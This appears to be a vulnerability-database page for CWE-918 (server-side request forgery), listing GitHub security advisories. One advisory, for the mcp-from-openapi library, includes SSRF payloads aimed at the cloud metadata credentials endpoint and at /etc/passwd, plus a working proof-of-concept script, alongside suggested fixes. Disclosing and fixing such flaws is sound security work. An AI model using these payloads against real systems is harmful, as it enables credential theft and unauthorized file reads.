Common Weakness Enumeration

CWE-918

Allowed

Server-Side Request Forgery (SSRF)

Abstraction: Base · Status: Incomplete

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

4625 vulnerabilities reference this CWE, most recent first.

GHSA-V5F5-7FMG-8VMH

Vulnerability from github – Published: 2024-04-02 06:30 – Updated: 2024-08-28 21:31
VLAI
Details

Server Side Request Forgery (SSRF) vulnerability in 71cms v1.0.0, allows remote unauthenticated attackers to obtain sensitive information via getweather.html.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-25187"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-02T04:15:12Z",
    "severity": "HIGH"
  },
  "details": "Server Side Request Forgery (SSRF) vulnerability in 71cms v1.0.0, allows remote unauthenticated attackers to obtain sensitive information via getweather.html.",
  "id": "GHSA-v5f5-7fmg-8vmh",
  "modified": "2024-08-28T21:31:27Z",
  "published": "2024-04-02T06:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25187"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xiaocheng-keji/71cms/issues/2"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/wisejayer/d365e93ce09b8a36641165e1d1a0a06c"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V5G3-MW88-C3JM

Vulnerability from github – Published: 2023-03-31 21:30 – Updated: 2023-04-10 18:30
VLAI
Details

forem up to v2022.11.11 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /articles/{id}. This vulnerability allows attackers to access network resources and sensitive information via a crafted POST request.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-27160"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-03-31T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "forem up to v2022.11.11 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /articles/{id}. This vulnerability allows attackers to access network resources and sensitive information via a crafted POST request.",
  "id": "GHSA-v5g3-mw88-c3jm",
  "modified": "2023-04-10T18:30:22Z",
  "published": "2023-03-31T21:30:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27160"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/b33t1e/6172286862a4486b5888f3cbbdc6316d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/forem/forem"
    },
    {
      "type": "WEB",
      "url": "https://notes.sjtu.edu.cn/s/MUUhEymt7"
    },
    {
      "type": "WEB",
      "url": "http://forem.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V5G8-P43F-VV3P

Vulnerability from github – Published: 2024-04-06 21:30 – Updated: 2024-08-01 15:31
VLAI
Details

An issue in Ladder v.0.0.1 thru v.0.0.21 allows a remote attacker to obtain sensitive information via a crafted request to the API.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-27620"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-06T19:15:07Z",
    "severity": "HIGH"
  },
  "details": "An issue in Ladder v.0.0.1 thru v.0.0.21 allows a remote attacker to obtain sensitive information via a crafted request to the API.",
  "id": "GHSA-v5g8-p43f-vv3p",
  "modified": "2024-08-01T15:31:37Z",
  "published": "2024-04-06T21:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27620"
    },
    {
      "type": "WEB",
      "url": "https://everywall.github.io"
    },
    {
      "type": "WEB",
      "url": "https://packetstormsecurity.com/files/177506/Ladder-0.0.21-Server-Side-Request-Forgery.html"
    },
    {
      "type": "WEB",
      "url": "http://ladder.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V5J5-586P-Q8QM

Vulnerability from github – Published: 2024-12-17 06:30 – Updated: 2024-12-17 06:30
VLAI
Details

The WP All Import Pro plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.9.3 due to missing SSRF protection on the pmxi_curl_download function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. On cloud platforms, it might allow attackers to read the Instance metadata.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-9624"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-12-17T06:15:21Z",
    "severity": "HIGH"
  },
  "details": "The WP All Import Pro plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.9.3 due to missing SSRF protection on the pmxi_curl_download function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. On cloud platforms, it might allow attackers to read the Instance metadata.",
  "id": "GHSA-v5j5-586p-q8qm",
  "modified": "2024-12-17T06:30:34Z",
  "published": "2024-12-17T06:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9624"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eabde2e7-5cd4-4c3e-959a-69e04f6350d3?source=cve"
    },
    {
      "type": "WEB",
      "url": "https://www.wpallimport.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V5JF-XRP6-XCRP

Vulnerability from github – Published: 2022-05-14 02:57 – Updated: 2022-05-14 02:57
VLAI
Details

An SSRF vulnerability was discovered in idreamsoft iCMS before V7.0.11 because the remote function in app/spider/spider_tools.class.php does not block private and reserved IP addresses such as 10.0.0.0/8. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-14514.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-14858"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-08-02T20:29:00Z",
    "severity": "HIGH"
  },
  "details": "An SSRF vulnerability was discovered in idreamsoft iCMS before V7.0.11 because the remote function in app/spider/spider_tools.class.php does not block private and reserved IP addresses such as 10.0.0.0/8. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-14514.",
  "id": "GHSA-v5jf-xrp6-xcrp",
  "modified": "2022-05-14T02:57:53Z",
  "published": "2022-05-14T02:57:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14858"
    },
    {
      "type": "WEB",
      "url": "https://github.com/idreamsoft/iCMS/issues/33"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V5QC-4RXP-7VRF

Vulnerability from github – Published: 2025-08-20 15:31 – Updated: 2025-08-20 15:31
VLAI
Details

CWE-918: Server-Side Request Forgery (SSRF) vulnerability exists that could cause unauthorized access to sensitive data when an attacker sends a specially crafted document to a vulnerable endpoint.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-54924"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-20T14:15:46Z",
    "severity": "HIGH"
  },
  "details": "CWE-918: Server-Side Request Forgery (SSRF) vulnerability exists that could cause unauthorized access to sensitive data when an attacker sends a specially crafted document to a vulnerable endpoint.",
  "id": "GHSA-v5qc-4rxp-7vrf",
  "modified": "2025-08-20T15:31:42Z",
  "published": "2025-08-20T15:31:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54924"
    },
    {
      "type": "WEB",
      "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-224-02\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2025-224-02.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V623-92C3-F29P

Vulnerability from github – Published: 2025-01-17 21:31 – Updated: 2025-01-18 00:30
VLAI
Details

OtCMS <=V7.46 is vulnerable to Server-Side Request Forgery (SSRF) in /admin/read.php, which can Read system files arbitrarily.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-57252"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-17T21:15:10Z",
    "severity": "MODERATE"
  },
  "details": "OtCMS \u003c=V7.46 is vulnerable to Server-Side Request Forgery (SSRF) in /admin/read.php, which can Read system files arbitrarily.",
  "id": "GHSA-v623-92c3-f29p",
  "modified": "2025-01-18T00:30:48Z",
  "published": "2025-01-17T21:31:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57252"
    },
    {
      "type": "WEB",
      "url": "https://github.com/J-0k3r/CVE-2024-57252"
    },
    {
      "type": "WEB",
      "url": "https://github.com/J-0k3r/some/blob/main/ssrf.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V6HF-4FPR-7XXC

Vulnerability from github – Published: 2022-10-18 12:00 – Updated: 2022-10-20 19:00
VLAI
Details

kkFileView 4.0 is vulnerable to Server-side request forgery (SSRF) via controller\OnlinePreviewController.java.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-42149"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-10-17T20:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "kkFileView 4.0 is vulnerable to Server-side request forgery (SSRF) via controller\\OnlinePreviewController.java.",
  "id": "GHSA-v6hf-4fpr-7xxc",
  "modified": "2022-10-20T19:00:32Z",
  "published": "2022-10-18T12:00:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42149"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xiaojiangxl/paper/blob/main/kkFileView/ssrf_vul_en.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V6HG-MV73-76VG

Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-02-24 21:31
VLAI
Details

Server-Side Request Forgery (SSRF) vulnerability in Burhan Nasir Smart Auto Upload Images smart-auto-upload-images allows Server Side Request Forgery.This issue affects Smart Auto Upload Images: from n/a through <= 1.2.2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-23803"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-19T09:16:13Z",
    "severity": "MODERATE"
  },
  "details": "Server-Side Request Forgery (SSRF) vulnerability in Burhan Nasir Smart Auto Upload Images smart-auto-upload-images allows Server Side Request Forgery.This issue affects Smart Auto Upload Images: from n/a through \u003c= 1.2.2.",
  "id": "GHSA-v6hg-mv73-76vg",
  "modified": "2026-02-24T21:31:32Z",
  "published": "2026-02-19T18:31:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23803"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/smart-auto-upload-images/vulnerability/wordpress-smart-auto-upload-images-plugin-1-2-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V6PH-XCQ9-QXXJ

Vulnerability from github – Published: 2026-04-08 19:22 – Updated: 2026-04-09 14:29
VLAI
Summary
mcp-from-openapi is Vulnerable to SSRF via $ref Dereferencing in Untrusted OpenAPI Specifications
Details

Summary

The mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing $ref values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the initialize() call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications.

Affected Versions

<= 2.1.2 (latest)

CWE

CWE-918: Server-Side Request Forgery (SSRF)

Vulnerability Details

File: index.js lines 870-875

When OpenAPIToolGenerator.initialize() is called, it dereferences the OpenAPI document using json-schema-ref-parser:

this.dereferencedDocument = await import_json_schema_ref_parser.default.dereference(
  JSON.parse(JSON.stringify(this.document))
);

No options are passed to .dereference() — no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in $ref values, including:

  • http:// and https:// URLs (internal services, cloud metadata)
  • file:// URLs (local filesystem)

This is the default behavior of json-schema-ref-parser — it resolves all $ref pointers by fetching the referenced resource.

Exploitation

Attack 1: SSRF to internal services / cloud metadata

A malicious OpenAPI spec containing:

{
  "openapi": "3.0.0",
  "info": { "title": "Evil API", "version": "1.0" },
  "paths": {
    "/test": {
      "get": {
        "operationId": "getTest",
        "summary": "test",
        "responses": {
          "200": {
            "description": "OK",
            "content": {
              "application/json": {
                "schema": {
                  "$ref": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
                }
              }
            }
          }
        }
      }
    }
  }
}

When processed by OpenAPIToolGenerator, the library fetches http://169.254.169.254/latest/meta-data/iam/security-credentials/ from the server, potentially leaking AWS IAM credentials.

Attack 2: Local file read

{
  "$ref": "file:///etc/passwd"
}

The ref parser reads local files and includes their contents in the dereferenced output.

Proof of Concept

const http = require('http');
const { OpenAPIToolGenerator } = require('mcp-from-openapi');

// Start attacker server to prove SSRF
const srv = http.createServer((req, res) => {
    console.log(`SSRF HIT: ${req.method} ${req.url}`);
    res.writeHead(200, {'Content-Type': 'application/json'});
    res.end('{"type":"string"}');
});

srv.listen(9997, async () => {
    const spec = {
        openapi: '3.0.0',
        info: { title: 'Evil', version: '1.0' },
        paths: {
            '/test': {
                get: {
                    operationId: 'getTest',
                    summary: 'test',
                    responses: {
                        '200': {
                            description: 'OK',
                            content: {
                                'application/json': {
                                    schema: { '$ref': 'http://127.0.0.1:9997/ssrf-proof' }
                                }
                            }
                        }
                    }
                }
            }
        }
    };

    const gen = new OpenAPIToolGenerator(spec, { validate: false });
    await gen.initialize();
    // Output: "SSRF HIT: GET /ssrf-proof"
    // The library fetched our attacker URL during $ref dereferencing.

    srv.close();
});

Tested and confirmed on mcp-from-openapi v2.1.2. The attacker server receives the GET request during initialize().

Impact

  • Cloud credential theft$ref pointing to http://169.254.169.254/ steals AWS/GCP/Azure metadata
  • Internal network scanning$ref values can probe internal services and ports
  • Local file readfile:// protocol reads arbitrary files from the server filesystem
  • No privileges required — attacker only needs to provide a crafted OpenAPI spec to any application using this library

Suggested Fix

Pass resolver options to dereference() that restrict which protocols and hosts are allowed:

this.dereferencedDocument = await $RefParser.dereference(
  JSON.parse(JSON.stringify(this.document)),
  {
    resolve: {
      file: false,        // Disable file:// protocol
      http: {
        // Only allow same-origin or explicitly allowed hosts
        headers: this.options.headers,
        timeout: this.options.timeout,
      }
    }
  }
);

Or disable all external resolution and require all schemas to be inline:

this.dereferencedDocument = await $RefParser.dereference(
  JSON.parse(JSON.stringify(this.document)),
  {
    resolve: { file: false, http: false, https: false }
  }
);
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "mcp-from-openapi"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@frontmcp/sdk"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@frontmcp/adapters"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39885"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T19:22:53Z",
    "nvd_published_at": "2026-04-08T21:17:00Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `mcp-from-openapi` library uses `@apidevtools/json-schema-ref-parser` to dereference `$ref` pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing `$ref` values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the `initialize()` call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications.\n\n\n## Affected Versions\n\n`\u003c= 2.1.2` (latest)\n\n## CWE\n\nCWE-918: Server-Side Request Forgery (SSRF)\n\n## Vulnerability Details\n\n**File:** `index.js` lines 870-875\n\nWhen `OpenAPIToolGenerator.initialize()` is called, it dereferences the OpenAPI document using `json-schema-ref-parser`:\n\n```javascript\nthis.dereferencedDocument = await import_json_schema_ref_parser.default.dereference(\n  JSON.parse(JSON.stringify(this.document))\n);\n```\n\nNo options are passed to `.dereference()` \u2014 no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in `$ref` values, including:\n\n- `http://` and `https://` URLs (internal services, cloud metadata)\n- `file://` URLs (local filesystem)\n\nThis is the default behavior of `json-schema-ref-parser` \u2014 it resolves all `$ref` pointers by fetching the referenced resource.\n\n## Exploitation\n\n### Attack 1: SSRF to internal services / cloud metadata\n\nA malicious OpenAPI spec containing:\n\n```json\n{\n  \"openapi\": \"3.0.0\",\n  \"info\": { \"title\": \"Evil API\", \"version\": \"1.0\" },\n  \"paths\": {\n    \"/test\": {\n      \"get\": {\n        \"operationId\": \"getTest\",\n        \"summary\": \"test\",\n        \"responses\": {\n          \"200\": {\n            \"description\": \"OK\",\n            \"content\": {\n              \"application/json\": {\n                \"schema\": {\n                  \"$ref\": \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"\n                }\n              }\n            }\n          }\n        }\n      }\n    }\n  }\n}\n```\n\nWhen processed by `OpenAPIToolGenerator`, the library fetches `http://169.254.169.254/latest/meta-data/iam/security-credentials/` from the server, potentially leaking AWS IAM credentials.\n\n### Attack 2: Local file read\n\n```json\n{\n  \"$ref\": \"file:///etc/passwd\"\n}\n```\n\nThe ref parser reads local files and includes their contents in the dereferenced output.\n\n## Proof of Concept\n\n```javascript\nconst http = require(\u0027http\u0027);\nconst { OpenAPIToolGenerator } = require(\u0027mcp-from-openapi\u0027);\n\n// Start attacker server to prove SSRF\nconst srv = http.createServer((req, res) =\u003e {\n    console.log(`SSRF HIT: ${req.method} ${req.url}`);\n    res.writeHead(200, {\u0027Content-Type\u0027: \u0027application/json\u0027});\n    res.end(\u0027{\"type\":\"string\"}\u0027);\n});\n\nsrv.listen(9997, async () =\u003e {\n    const spec = {\n        openapi: \u00273.0.0\u0027,\n        info: { title: \u0027Evil\u0027, version: \u00271.0\u0027 },\n        paths: {\n            \u0027/test\u0027: {\n                get: {\n                    operationId: \u0027getTest\u0027,\n                    summary: \u0027test\u0027,\n                    responses: {\n                        \u0027200\u0027: {\n                            description: \u0027OK\u0027,\n                            content: {\n                                \u0027application/json\u0027: {\n                                    schema: { \u0027$ref\u0027: \u0027http://127.0.0.1:9997/ssrf-proof\u0027 }\n                                }\n                            }\n                        }\n                    }\n                }\n            }\n        }\n    };\n\n    const gen = new OpenAPIToolGenerator(spec, { validate: false });\n    await gen.initialize();\n    // Output: \"SSRF HIT: GET /ssrf-proof\"\n    // The library fetched our attacker URL during $ref dereferencing.\n\n    srv.close();\n});\n```\n\n**Tested and confirmed** on mcp-from-openapi v2.1.2. The attacker server receives the GET request during `initialize()`.\n\n## Impact\n\n- **Cloud credential theft** \u2014 `$ref` pointing to `http://169.254.169.254/` steals AWS/GCP/Azure metadata\n- **Internal network scanning** \u2014 `$ref` values can probe internal services and ports\n- **Local file read** \u2014 `file://` protocol reads arbitrary files from the server filesystem\n- **No privileges required** \u2014 attacker only needs to provide a crafted OpenAPI spec to any application using this library\n\n## Suggested Fix\n\nPass resolver options to `dereference()` that restrict which protocols and hosts are allowed:\n\n```javascript\nthis.dereferencedDocument = await $RefParser.dereference(\n  JSON.parse(JSON.stringify(this.document)),\n  {\n    resolve: {\n      file: false,        // Disable file:// protocol\n      http: {\n        // Only allow same-origin or explicitly allowed hosts\n        headers: this.options.headers,\n        timeout: this.options.timeout,\n      }\n    }\n  }\n);\n```\n\nOr disable all external resolution and require all schemas to be inline:\n\n```javascript\nthis.dereferencedDocument = await $RefParser.dereference(\n  JSON.parse(JSON.stringify(this.document)),\n  {\n    resolve: { file: false, http: false, https: false }\n  }\n);\n```",
  "id": "GHSA-v6ph-xcq9-qxxj",
  "modified": "2026-04-09T14:29:54Z",
  "published": "2026-04-08T19:22:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39885"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/agentfront/frontmcp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/agentfront/frontmcp/releases/tag/v1.0.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "mcp-from-openapi is Vulnerable to SSRF via $ref Dereferencing in Untrusted OpenAPI Specifications"
}

No mitigation information available for this CWE.

CAPEC-664: Server Side Request Forgery

An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.